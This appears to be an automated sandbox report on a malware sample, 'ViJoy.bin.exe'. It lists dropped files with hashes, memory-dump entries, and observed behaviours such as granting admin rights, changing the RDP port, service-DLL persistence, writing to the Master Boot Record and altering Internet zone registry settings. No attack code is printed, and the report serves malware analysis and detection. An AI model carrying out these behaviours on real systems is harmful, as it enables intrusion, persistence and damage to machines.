SHA1 829498d010f331248be9fd512deb44d1eceac344
SHA256 f519d4517271e01ea6807890fcbc1573e64844b6a8105aa7c3462ea65bb3c7fe
SHA512 d7e5bd51a819b1bb8ec59fbca742fbf40806b8e4e04f56efb00c8b5477b275d1479565b3a156628a86254801610dbef13250ef5b2015da1ef21ff869ef60f552

\Users\Public\Documents\Wondershare\NFWCHK.exe

MD5 27cfb3990872caa5930fa69d57aefe7b
SHA1 5e1c80d61e8db0cdc0c9b9fa3b2e36d156d45f8f
SHA256 43881549228975c7506b050bce4d9b671412d3cdc08c7516c9dbbb7f50c25146
SHA512 a1509024872c99c1cf63f42d9f3c5f063afde4e9490c21611551ddd2322d136ce9240256113c525305346cf7b66ccca84c3df67637c8fecbfeebf14ffa373a2a

C:\Users\Public\Documents\Wondershare\NFWCHK.exe.config

MD5 ad0967a0ab95aa7d71b3dc92b71b8f7a
SHA1 ed63f517e32094c07a2c5b664ed1cab412233ab5
SHA256 9c1212bc648a2533b53a2d0afcec518846d97630afb013742a9622f0df7b04fc
SHA512 85766a907331f60044ec205cf345453fc3d44bfcac296ac93a12e8a752b84290dfd94f73b71de82f46f9503177d29602cbb87549f89dc61373d889b4ea26634b

C:\Users\Admin\AppData\Local\Temp\ready.ps1

MD5 3447df88de7128bdc34942334b2fab98
SHA1 519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA256 9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA512 2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

\??\c:\Users\Admin\AppData\Local\Temp\onrvk3o1\onrvk3o1.cmdline

MD5 22996ab3f7e17a256f6b64c92f1440ec
SHA1 36c3352794728fb7ec36985eb3fa6e03c8e08d61
SHA256 00e9ca96abe8e0e7713f6d8b17eda86423e8b29eee028250954f71f4f1cd945d
SHA512 7698200e6aa04f1e818a3a9bac213dc84f8052d5df0926d7602f8d2b6e9c634742b8401121c5796c254d18a2b3e03a94d9ece8111cf6facf14467e0020943ad3

\??\c:\Users\Admin\AppData\Local\Temp\onrvk3o1\onrvk3o1.0.cs

MD5 4864fc038c0b4d61f508d402317c6e9a
SHA1 72171db3eea76ecff3f7f173b0de0d277b0fede7
SHA256 0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA512 9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

memory/592-98-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\onrvk3o1\CSC85EF2F55F5C9461DAB91D8D18757A.TMP

MD5 08ed9c008442229d7f73e0ead4bf43cc
SHA1 9921bee251c9c9d0c8998c37dc721d49dae33455
SHA256 e9d5910e7ced804c6ca95143474a90fa8d0d388381757d5665caee84effa1fca
SHA512 12b8dd059699b1346affea3dea1d3a9b8ed2b783850384af56248dc86ef73dabf24607385594537c738e6481952793c421bc822b49cb33122c00c3b09def1821

C:\Users\Admin\AppData\Local\Temp\RES63B2.tmp

MD5 dad641a636d8ac8b2f3e339898dae134
SHA1 589e4e91276c5ede8947db7551883746436997be
SHA256 1030100142afab751f61268eaec12e64999bd9b8d038317950e207dc9307c339
SHA512 0f5f488372872854fbfbffde4e299ba6ec6ec7210416f9f89aaa37adc02b0643dc5fbfd686daaae506366c1a363ae959ff800b9e6fb603bc2da5cc5d7cf36b67

memory/324-102-0x00000000022C0000-0x00000000022C1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\onrvk3o1\onrvk3o1.dll

MD5 01a6332987393cd457164f3c64d1acb3
SHA1 498d2678223fddb1685addecbd2303dda0814777
SHA256 339bf6cb96985dbe4ee60aaf2dc3d4622c018766732f6741d898fc10024b15cf
SHA512 1684bc119955550beba5b3df34e55d3c97164c2ec89e033cde4138f1ff78debc71b324b838d00310084afe76e6c0f6680df4a6de59c75415368c5fe31ef43579

C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

MD5 43473f4e719958639a9d89e5d8388999
SHA1 ccb79eb606a23daa4b3ff8f996a2fbf281f31491
SHA256 ce84b142a2983e1f60b3051cbff38153424a016178ce3fcf703e3694eb474734
SHA512 1051092c5eae13758e8e01086907effc5c603cc1f9456fb2cdb951cb4b196c5c3d089ffd2e981b5d6731b0e6b24402fb2808a20f66ac6dcb1704a8f4b457b1fa

memory/324-104-0x000000001B600000-0x000000001B601000-memory.dmp

memory/324-105-0x000000001C2C0000-0x000000001C2C1000-memory.dmp

memory/324-106-0x000000001C4A0000-0x000000001C4A1000-memory.dmp

memory/1592-107-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 86713cf6e8877d4a97073e50e55b6b22
SHA1 7322f65342dad4888eee2edbefc7450d1560ebe1
SHA256 798743adfdf578c7b35266e74c5aa7e265a11f5ccff3e74311006f7b23d55b2e
SHA512 d9efbd4155bf99a2f0bbe2f66f2ef04e0c4d2aa624add5acc6f0aab4a2f22d742a86102d3756f5f86ccd9d33165d106ddb02c87247dd7a91b58bf7546872a900

memory/1592-113-0x0000000002590000-0x0000000002591000-memory.dmp

memory/1592-115-0x000000001ABA0000-0x000000001ABA1000-memory.dmp

memory/1592-117-0x000000001B560000-0x000000001B561000-memory.dmp

memory/1592-118-0x0000000001FD0000-0x0000000001FD1000-memory.dmp

memory/1592-119-0x000000001AC30000-0x000000001AC32000-memory.dmp

memory/324-121-0x000000001AB1A000-0x000000001AB39000-memory.dmp

memory/1592-120-0x000000001AC34000-0x000000001AC36000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5 de8edb958221e7ed4f31c39c5af97bf1
SHA1 c6d51383c2769f1ff60b0fe11748c8f4b5c16a4b
SHA256 56172814a2b22132fce1580d6e07e554af3f65254cc0e00d860d5c939845d4e2
SHA512 ba4ee81a15c1155886854494cc507a8a6ab1b650fccef298aba22fe114ff801a63ff746ea0baf8b2c681d7db32842d13279977dc011adac54a481d8d29b0e848

memory/1592-126-0x000000001B690000-0x000000001B691000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_298019a0-6dd5-4646-890b-a6ff115313a7

MD5 6f0d509e28be1af95ba237d4f43adab4
SHA1 c665febe79e435843553bee86a6cea731ce6c5e4
SHA256 f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e
SHA512 8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797

memory/1592-139-0x000000001B6E0000-0x000000001B6E1000-memory.dmp

memory/1592-140-0x000000001B840000-0x000000001B841000-memory.dmp

memory/1144-141-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 86713cf6e8877d4a97073e50e55b6b22
SHA1 7322f65342dad4888eee2edbefc7450d1560ebe1
SHA256 798743adfdf578c7b35266e74c5aa7e265a11f5ccff3e74311006f7b23d55b2e
SHA512 d9efbd4155bf99a2f0bbe2f66f2ef04e0c4d2aa624add5acc6f0aab4a2f22d742a86102d3756f5f86ccd9d33165d106ddb02c87247dd7a91b58bf7546872a900

memory/1144-147-0x000000001AA84000-0x000000001AA86000-memory.dmp

memory/1144-146-0x000000001AA80000-0x000000001AA82000-memory.dmp

memory/1144-149-0x000000001A820000-0x000000001A821000-memory.dmp

memory/1144-151-0x000000001B750000-0x000000001B751000-memory.dmp

memory/1144-153-0x000000001AA10000-0x000000001AA11000-memory.dmp

memory/1144-154-0x00000000022F0000-0x00000000022F1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5 7b308811e1c952bc4520c55e2da3d523
SHA1 cb208adf2a26b9b2fcc919cbfaf0e112914b44cd
SHA256 1a95412d7cac095a0a4cca096cfd341aa0e5262b0bbce333f010b020fc4a3ac6
SHA512 b37774d4039e0c29c82e8fca20db6f1b48465baefa8c88f83e67778244d9952383e4c095d8c300ef3ebeef165221c6182d5d0bfe6d3b830c6da99789975b6668

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4affe4b2-7a8d-46ab-bdbe-3e0c98556b74

MD5 a70ee38af4bb2b5ed3eeb7cbd1a12fa3
SHA1 81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9
SHA256 dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d
SHA512 8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_10e4f2b3-4976-4812-af34-7d339d387442

MD5 faa37917b36371249ac9fcf93317bf97
SHA1 a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4
SHA256 b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132
SHA512 614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_65e58f35-049a-4241-9d78-2ff6101089fd

MD5 2d5cd190b5db0620cd62e3cd6ba1dcd3
SHA1 ff4f229f4fbacccdf11d98c04ba756bda80aac7a
SHA256 ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d
SHA512 edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_59011c0b-6c2b-4eee-bb49-358141eeacd8

MD5 d89968acfbd0cd60b51df04860d99896
SHA1 b3c29916ccb81ce98f95bbf3aa8a73de16298b29
SHA256 1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9
SHA512 b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4de30aa8-244a-488c-9fb4-381dadbd874d

MD5 e5b3ba61c3cf07deda462c9b27eb4166
SHA1 b324dad73048be6e27467315f82b7a5c1438a1f9
SHA256 b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925
SHA512 a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_af71afb2-37ab-4118-bb8d-1d4f9fc45baa

MD5 7f79b990cb5ed648f9e583fe35527aa7
SHA1 71b177b48c8bd745ef02c2affad79ca222da7c33
SHA256 080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683
SHA512 20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda

memory/2004-162-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 86713cf6e8877d4a97073e50e55b6b22
SHA1 7322f65342dad4888eee2edbefc7450d1560ebe1
SHA256 798743adfdf578c7b35266e74c5aa7e265a11f5ccff3e74311006f7b23d55b2e
SHA512 d9efbd4155bf99a2f0bbe2f66f2ef04e0c4d2aa624add5acc6f0aab4a2f22d742a86102d3756f5f86ccd9d33165d106ddb02c87247dd7a91b58bf7546872a900

memory/2004-169-0x00000000028B4000-0x00000000028B6000-memory.dmp

memory/2004-168-0x00000000028B0000-0x00000000028B2000-memory.dmp

\??\PIPE\lsarpc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1168-178-0x0000000000000000-mapping.dmp

C:\Windows\system32\rfxvmt.dll

MD5 dc39d23e4c0e681fad7a3e1342a2843c
SHA1 58fd7d50c2dca464a128f5e0435d6f0515e62073
SHA256 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA512 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

memory/860-180-0x0000000000000000-mapping.dmp

memory/1124-181-0x0000000000000000-mapping.dmp

memory/856-182-0x0000000000000000-mapping.dmp

memory/1584-183-0x0000000000000000-mapping.dmp

memory/1476-184-0x0000000000000000-mapping.dmp

memory/1520-185-0x0000000000000000-mapping.dmp

memory/1488-186-0x0000000000000000-mapping.dmp

memory/1644-187-0x0000000000000000-mapping.dmp

memory/880-188-0x0000000000000000-mapping.dmp

memory/936-189-0x0000000000000000-mapping.dmp

memory/1692-190-0x0000000000000000-mapping.dmp

memory/2004-191-0x0000000000000000-mapping.dmp

memory/1168-192-0x0000000000000000-mapping.dmp

memory/860-193-0x0000000000000000-mapping.dmp

memory/1592-194-0x0000000000000000-mapping.dmp

memory/1144-195-0x0000000000000000-mapping.dmp

memory/556-196-0x0000000000000000-mapping.dmp

memory/1584-197-0x0000000000000000-mapping.dmp

memory/1712-198-0x0000000000000000-mapping.dmp

memory/956-199-0x0000000000000000-mapping.dmp

\Windows\Branding\mediasrv.png

MD5 271eacd9c9ec8531912e043bc9c58a31
SHA1 c86e20c2a10fd5c5bae4910a73fd62008d41233b
SHA256 177d6aab26c15ecf87f29f92ad0eaff355d195de1c0ef17d9cb9b7483c288934
SHA512 87375d3e0c2505ff8d5860db4a9a2cbb88da73f492f2be937b1dfd1afa37133061b7c69121727728835eaf545ce1850ec4889bad33366b8d4dadd7838af791c0

\Windows\Branding\mediasvc.png

MD5 1fa9c1e185a51b6ed443dd782b880b0d
SHA1 50145abf336a196183882ef960d285bd77dd3490
SHA256 f25560518e8bebbc0abdde4c0241833e432ad4c56f934bb18067c1abf7305959
SHA512 16bd50a904fa062f8ec6e41f00000da5d0221164c3eda90bc1791e195b25ef74bb9e1264d7536c204f9a01ca1489ae43484ceb1e7bb4f650aacf90fa16f1c9fc

memory/1692-202-0x0000000000000000-mapping.dmp

memory/380-203-0x0000000000000000-mapping.dmp

memory/1120-204-0x0000000000000000-mapping.dmp

memory/1520-205-0x0000000000000000-mapping.dmp

memory/740-206-0x0000000000000000-mapping.dmp

memory/2012-207-0x0000000000000000-mapping.dmp

memory/1168-208-0x0000000000000000-mapping.dmp

memory/1592-209-0x0000000000000000-mapping.dmp

memory/1432-210-0x0000000000000000-mapping.dmp

memory/1456-211-0x0000000000000000-mapping.dmp

memory/1644-212-0x0000000000000000-mapping.dmp

memory/904-213-0x0000000000000000-mapping.dmp

memory/916-214-0x0000000000000000-mapping.dmp

memory/1644-215-0x0000000000000000-mapping.dmp

memory/1456-216-0x0000000000000000-mapping.dmp

memory/940-217-0x0000000000000000-mapping.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/940-224-0x00000000195D0000-0x00000000195D2000-memory.dmp

memory/940-225-0x00000000195D4000-0x00000000195D6000-memory.dmp

memory/940-254-0x00000000195DA000-0x00000000195F9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Setup.zip

MD5 36f178576dcb8db35d6f06448b1eb510
SHA1 62277c90cc2b1bb81b36571037afe5081b0605d5
SHA256 192fed6a13a0e73d5196a43bc72eeac16e4962ce465ea67dd60d8b16368c215a
SHA512 9e1dfe8e5196afb5a39d5302d6948cc7282b95c77aba435ed14453094022a302a6c780fbfd2615377d94e2b7e2913601e9129eb6d3398db0ba25344075e5dc96

memory/984-256-0x0000000000000000-mapping.dmp

memory/556-257-0x0000000000000000-mapping.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2021-07-21 08:36

Reported

2021-07-21 08:38

Platform

win10v20210410

Max time kernel

128s

Max time network

113s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe"

Signatures

Grants admin privileges

Modifies RDP port number used by Windows

Sets DLL path for service in the registry

persistence

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Roaming\Templers\exe2.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI5DA7.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\ShellBrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI5DC8.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_wq0c2djq.mgk.psm1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI5DD9.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\Basebrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI5D87.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI5DB8.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_5zuegjl3.xmj.ps1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 339704ea112ed701 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
